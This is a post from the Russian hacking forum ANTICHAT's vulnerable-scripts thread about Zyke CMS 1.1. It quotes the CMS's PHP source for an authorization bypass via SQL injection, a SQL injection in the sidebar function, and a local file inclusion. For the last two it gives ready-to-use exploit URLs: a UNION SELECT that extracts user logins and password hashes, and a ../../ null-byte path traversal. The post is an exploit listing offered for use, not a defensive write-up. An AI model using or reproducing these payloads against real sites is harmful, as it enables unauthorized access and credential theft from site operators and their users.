ANTICHAT - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

Zyke CMS 1.1

site:www.zykecms.com

Authorization bypass

need: mq=off

file: index.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'loginbt'[/COLOR][COLOR="#007700"]]))

{

if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

{

    if ([/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])

    {

            if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: admin/'[/COLOR][COLOR="#007700"]);

            else

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

        }

        else

        {

[/COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"wrong username/password 
"[/COLOR][COLOR="#007700"];    

        }

    }

}

...................

    

function[/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

    

    if ([/COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

    {

[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'last_access'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"](); 

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

        return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

    } 

    else 

        return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR]

result:

Код HTML:

SQL-Injection

need: mq=off

file: index.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) 

...................

function[/COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE urlname = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

    if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])

    {

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE id = '1'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

    }

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

    return[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sidebar'[/COLOR][COLOR="#007700"]];

}

[/COLOR][/COLOR]

result:

Код:

/index.php?p=content&id=-home'+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+users--+

LFI

need: mq=off

file: index.php :d

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]))

    if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]))

        include ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

result:

Код:

/index.php?p=../../[local_file]%00&id=home

//зачетная cms...